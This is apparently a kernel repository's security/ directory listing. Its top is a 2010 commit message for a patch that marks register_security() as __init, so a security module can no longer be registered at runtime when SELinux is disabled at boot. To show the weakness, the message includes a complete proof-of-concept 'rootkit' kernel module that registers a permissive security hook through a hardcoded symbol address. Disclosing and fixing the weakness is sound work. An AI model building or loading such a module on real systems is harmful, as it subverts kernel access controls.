kernel-fxtec-pro1x/security
wzt.wzt@gmail.com c1e992b996 Security: Add __init to register_security to disable load a security module on runtime
LSM framework doesn't allow to load a security module on runtime, it must be loaded on boot time.
but in security/security.c:
int register_security(struct security_operations *ops)
{
        ...
        if (security_ops != &default_security_ops)
                return -EAGAIN;
        ...
}
if security_ops == &default_security_ops, it can access to register a security module. If selinux is enabled,
other security modules can't register, but if selinux is disabled on boot time, the security_ops was set to
default_security_ops, LSM allows other kernel modules to use register_security() to register a not trust
security module. For example:

disable selinux on boot time(selinux=0).

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/version.h>
#include <linux/string.h>
#include <linux/list.h>
#include <linux/security.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

extern int register_security(struct security_operations *ops);
int (*new_register_security)(struct security_operations *ops);

int rootkit_bprm_check_security(struct linux_binprm *bprm)
{
        return 0;
}

struct security_operations rootkit_ops = {
                .bprm_check_security = rootkit_bprm_check_security,
};

static int rootkit_init(void)
{
        printk("Load LSM rootkit module.\n");

	/* cat /proc/kallsyms | grep register_security */
        new_register_security = 0xc0756689;
        if (new_register_security(&rootkit_ops)) {
                printk("Can't register rootkit module.\n");
                return 0;
        }
        printk("Register rootkit module ok.\n");

        return 0;
}

static void rootkit_exit(void)
{
        printk("Unload LSM rootkit module.\n");
}

module_init(rootkit_init);
module_exit(rootkit_exit);

Signed-off-by: Zhitong Wang <zhitong.wangzt@alibaba-inc.com>
Signed-off-by: James Morris <jmorris@namei.org>
2010-03-03 09:15:28 +11:00
..
integrity/ima security: fix error return path in ima_inode_alloc 2010-02-25 07:54:33 +11:00
keys security: Apply lockdep-based checking to rcu_dereference() uses 2010-02-25 10:34:52 +01:00
selinux netlabel: fix export of SELinux categories > 127 2010-02-25 17:49:20 +11:00
smack net: rename skb->iif to skb->skb_iif 2009-11-20 15:35:04 -08:00
tomoyo Fix ACC_MODE() for real 2010-01-14 09:05:26 -05:00
capability.c security: report the module name to security_module_request 2009-11-10 09:33:46 +11:00
commoncap.c remove CONFIG_SECURITY_FILE_CAPABILITIES compile option 2009-11-24 15:06:47 +11:00
device_cgroup.c cgroups: let ss->can_attach and ss->attach do whole threadgroups at a time 2009-09-24 07:20:58 -07:00
inode.c get rid of pointless checks after simple_pin_fs() 2010-01-26 22:22:26 -05:00
Kconfig remove CONFIG_SECURITY_FILE_CAPABILITIES compile option 2009-11-24 15:06:47 +11:00
lsm_audit.c Merge branch 'master' of /home/davem/src/GIT/linux-2.6/ 2009-12-05 15:22:26 -08:00
Makefile NOMMU: Optimise away the {dac_,}mmap_min_addr tests 2009-12-17 09:25:19 +11:00
min_addr.c security/min_addr.c: make init_mmap_min_addr() static 2009-12-17 09:24:22 +11:00
security.c Security: Add __init to register_security to disable load a security module on runtime 2010-03-03 09:15:28 +11:00